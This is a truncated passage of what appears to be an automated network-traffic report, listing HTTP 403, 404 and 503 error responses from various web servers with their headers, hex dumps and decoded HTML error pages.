73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:24 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:29 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:29 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:29 GMTServer: Apache/2.4.57 (Ubuntu)Content-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 70 6c 75 73 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at workplus.hu Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=11X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: 2781a2cb-b51a-49c3-baee-b5da2e7bf501CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XcT8bF0Jt6NGTkrmoy9y%2F2KstvT8rkJBpF4%2Fnc%2BMV9Pmwt1sMHTXgPx2yJSD9M%2BCWIgOY7aUJnDrm4RuSfEUCfod%2FfcodzxkxHSi3pbMFp0ZuHsjy6VZVp6Toj%2Bvdcc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=78.000069Server: cloudflareCF-RAY: 81371959bdb21001-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Mon, 09 Oct 2023 13:51:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/8.2.9Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 09 Oct 2023 13:51:35 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:35 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:36 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:38 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:39 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
